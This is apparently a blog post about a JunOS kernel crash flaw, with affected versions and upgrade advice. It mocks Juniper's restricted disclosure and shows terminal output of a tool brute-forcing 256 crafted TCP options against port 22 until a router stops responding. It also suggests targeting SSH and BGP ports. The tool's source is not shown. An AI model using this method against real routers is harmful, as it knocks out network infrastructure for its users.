Juniper JUNOS Remote Kernel Crash Flaw!

"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.

The JunOS kernel will crash (i.e. core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with Junos's firewall filter. A router receiving this specific TCP packet will crash and reboot.

Affected Devices:

JunOS 3.x - 10.x (versions released later then 1/28/2009)

Software releases built on or after January 28, 2009 have already fixed the issue.

Solution:

Upgrade the OS. There are no totally effective workarounds.

Funny:

"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."

"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.

Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?

It's more than enough! We have 256 guesses ;)

Simple Proof-of-Concept demo:

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>

hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and JunOS router is dead, and after analyze sniffing traffic we are know true "evil" TCP packet!

The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue!

Successful exploitation requires knowledge of a listening remote TCP port (opened or firewall filtered, it doesn't matter at all).

For example, attackers can send (blind) a many numbers of crafted packets to "well known" TCP ports (22/SSH, 179/BGP and other).

And That's enough.